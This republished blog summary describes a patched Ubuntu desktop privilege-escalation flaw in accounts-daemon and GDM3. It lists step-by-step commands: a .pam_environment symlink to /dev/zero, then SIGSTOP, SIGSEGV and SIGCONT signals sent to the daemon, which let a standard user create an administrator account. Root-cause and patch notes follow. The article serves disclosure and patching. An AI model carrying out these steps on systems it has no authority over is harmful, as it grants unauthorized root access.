How to Exploit and Patch Ubuntu’s Accounts‑Daemon & GDM3 Privilege Escalation
Security researcher Kevin Backhouse revealed a local‑privilege‑escalation flaw in Ubuntu desktop that lets a standard user create a sudo‑enabled account without a password by abusing a .pam_environment symlink, crashing accounts‑daemon, and forcing GNOME’s initial‑setup wizard, with patches now available.
Vulnerability Overview
A local privilege‑escalation (LPE) bug affects Ubuntu desktop releases 20.10, 20.04, 18.04 and 16.04 LTS. A non‑privileged user can create a new sudo‑capable account without knowing the system password.
Attack Method
Create a malicious symlink named .pam_environment that points to /dev/zero in the user’s home directory. ln -s /dev/zero .pam_environment If .pam_environment already exists, rename it first.
Open Settings → Region & Language and attempt to change the language. The dialog freezes because accounts-daemon is stuck.
Remove the symlink to avoid being locked out of the original account. rm .pam_environment Find the PID of the hung accounts-daemon process (e.g., with pidof ). pidof accounts-daemon Pause the daemon with SIGSTOP . kill -SIGSTOP <em><PID></em> Schedule a sequence of signals that will be executed after logout: first send SIGSEGV to crash the daemon, then SIGCONT to resume it.
nohup bash -c "sleep 30s; kill -SIGSEGV <em><PID></em>; kill -SIGCONT <em><PID></em>" &Log out. When the daemon crashes, GDM3 assumes zero users, launches gnome-initial-setup , and forces creation of a new user with administrator rights.
Root Cause
accounts‑daemon bug : The function is_in_pam_environment reads .pam_environment. If the file is a symlink to /dev/zero, the daemon reads an infinite stream of zeros, consumes 100 % CPU and drops its root privileges.
GDM3 bug : GDM3 queries accounts-daemon to count existing users. When the daemon is unresponsive, GDM3 times out, assumes no users, and starts the initial‑setup wizard, which requires an admin account.
Mitigation / Official Fix
Patches addressing both bugs have been merged upstream. Users should update their Ubuntu systems immediately. The issue only affects desktop editions that use GNOME; command‑line‑only installations or alternative desktop environments are not vulnerable.
References
GitHub Security Lab blog: https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE
Discussion on Hacker News: https://news.ycombinator.com/item?id=25053238
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
Liangxu Linux
Liangxu, a self‑taught IT professional now working as a Linux development engineer at a Fortune 500 multinational, shares extensive Linux knowledge—fundamentals, applications, tools, plus Git, databases, Raspberry Pi, etc. (Reply “Linux” to receive essential resources.)
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.